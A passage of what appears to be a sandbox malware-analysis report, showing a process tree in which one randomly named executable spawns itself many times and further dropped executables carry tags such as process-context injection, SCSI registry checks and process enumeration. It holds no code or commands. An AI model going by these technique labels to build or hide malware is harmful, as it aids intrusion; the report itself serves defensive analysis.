    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:12648
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:7944
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:8556
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:17456
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:10700
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15268
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:13324
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:18248
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:16984
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:2020
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:8664
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:13536
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:18572
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:18796
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:19024
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:17556
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:18764
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:19276
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:8560
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:4596
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:19172
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:7300
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:2128
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:19108
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:16688
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:18080
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:19764
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:20096
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:20416
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:19548
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:20012
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:20192
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:19880
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:20404
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:11828
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:14052
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:19972
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:12408
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:19468
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9816
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:20660
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21192
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21424
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:14000
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21220
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:20824
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21052
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21084
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:6360
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:20484
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:20080
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:12164
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21620
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21968
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:22308
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21632
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:22172
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:22424
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:20344
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:16240
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:22204
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:22092
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:22472
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21404
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:22728
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:22940
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:23108
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21376
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:22980
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:23408
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:22436
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:19984
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21520
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:14552
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15544
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:23716
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:23952
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24100
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24316
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:23588
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:23964
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24284
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:22652
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24120
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24536
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:22772
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24568
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24720
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24928
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:25148
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24800
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:25328
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:25592
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24348
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:25460
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:25892
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:26304
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:25928
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:26424
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:632
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21532
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24912
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:23576
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24908
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:25908
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:26524
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:19340
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:26976
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:24880
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:26780
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:26508
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:28172
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:28616
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:27724
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:4688
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:28172
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9788
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:29264
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:29604
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:28884
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:13708
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:29988
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:30352
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:29624
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:29728
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:30648
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:29440
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:30376
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:30512
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15924
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:30796
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:31444
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:29172
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:30920
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:28824
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:31084
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:30768
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:21748
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:31920
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:32168
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:32524
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9700
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:32404
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:31504
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:26676
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:30708
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:10844
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:10184
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:25644
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:30916
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:31584
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:28468
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:10668
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:29788
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9508
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:27956
- C:\Users\Admin\Documents\5BB88lfXVhc7fn9HwGPubJrb.exe
  "C:\Users\Admin\Documents\5BB88lfXVhc7fn9HwGPubJrb.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:756
- - C:\Users\Admin\Documents\5BB88lfXVhc7fn9HwGPubJrb.exe
    "C:\Users\Admin\Documents\5BB88lfXVhc7fn9HwGPubJrb.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    PID:3900
- C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
  "C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe"
  2⤵
